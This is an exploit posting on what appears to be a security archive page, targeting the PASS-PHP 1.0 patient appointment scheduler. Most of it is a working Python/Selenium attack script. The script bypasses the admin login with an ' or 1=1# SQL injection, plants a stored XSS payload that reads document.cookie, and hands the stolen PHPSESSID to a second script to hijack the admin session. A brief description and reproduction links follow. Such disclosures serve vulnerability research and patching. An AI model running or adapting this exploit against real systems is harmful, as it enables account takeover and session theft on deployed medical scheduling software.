what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PASS-PHP 1.0 SQL Injection / Cross Site Scripting

PASS-PHP 1.0 SQL Injection / Cross Site Scripting
Posted Sep 27, 2021
Authored by nu11secur1ty

PASS-PHP version 1.0 suffers from remote SQL injection and cross site scripting vulnerabilities.

tags | exploit, remote, php, vulnerability, xss, sql injection
SHA-256 | 1145a2df44f5b9647b8ad4207215a93abb5fe637fa0a66c4b4596511a4b1e5f5

PASS-PHP 1.0 SQL Injection / Cross Site Scripting

Change Mirror Download
### Exploit Title: PASS-PHP (by: oretnom23 ) v1.0 is vulnerable to
remote SqL-Injection bypass Authentication, XSS-Stored and PHPSESSID
Hijacking.
### Author: nu11secur1ty
### Testing and Debugging: nu11secur1ty
### Date: 09.24.2021
### Vendor: https://www.sourcecodester.com/user/257130/activity
### Link: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
### CVE: CVE-nu11-06-092421

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-nu11-06-092421

from selenium import webdriver
import time
import os
from colorama import init, Fore, Back, Style
init(convert=True)
import requests


#enter the link to the website you want to automate login.
website_link="http://localhost/scheduler/admin/login.php"

#enter your login username
username="nu11secur1ty' or 1=1#"

#enter your login password
password="nu11secur1ty' or 1=1#"

#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="password"

browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
browser.maximize_window()
time.sleep(1)
browser.execute_script("document.querySelector('[class=\"btn
btn-primary btn-block\"]').click()")

time.sleep(1)
exploit_link="http://localhost/scheduler/admin/?page=user/manage_user"
browser.get((exploit_link))

time.sleep(3)
browser.execute_script("document.querySelector('[name=\"firstname\"]').value=\"<script>alert(document.cookie)</script>\"")
browser.execute_script("document.querySelector('[name=\"lastname\"]').value=\"<script>alert(document.cookie)</script>\"")
browser.execute_script("document.querySelector('[name=\"username\"]').value=\"PWNED_\"")
browser.execute_script("document.querySelector('[name=\"password\"]').value=\"tralala_\"")
time.sleep(1)
browser.execute_script("document.querySelector('[class=\"btn btn-sm
btn-primary mr-2\"]').click()")

coockie=browser.execute_script("return document.cookie")
coockie=coockie.split("=")[1]
print(coockie)
browser.close()

print(Fore.YELLOW +"Please wait for PoC to hijacking the PHPSESSID...\n")
print(Style.RESET_ALL)
time.sleep(7)
os.system("python PWNPHPSESSID.py " + coockie)

print(Fore.GREEN +"The payload for CVE-nu11-06 is deployed your admin
account is PWNED...\n")
print(Fore.RED +"Your Cookie: PHPSESSID is hijacked and we have
another bypass login...\n")
print(Style.RESET_ALL)

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")


------------------------------------------------------------------

### Description:
The PASS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote
SqL-Injection bypass Authentication, XSS-Stored and PHPSESSID
Hijacking.
The vulnerable app: to remote SqL - injection bypass Authentication is
"login.php", with parameters: "username" and "password".
After the successful PWNED of the credentials for the admin account,
the malicious user can be storing an XSS payload, whit who can take
the active PHPSESSID
every time when he wants to log in to the system with an admin account
by using this exploit.

-------------------------------------------------------------------
### BR
- [+] @nu11secur1ty System Administrator - Infrastructure and
Penetration Testing Engineer

-------------------------------------------------------------------
### Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-06-092421
### Proof: https://streamable.com/1o87sl
### BR nu11secur1ty


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close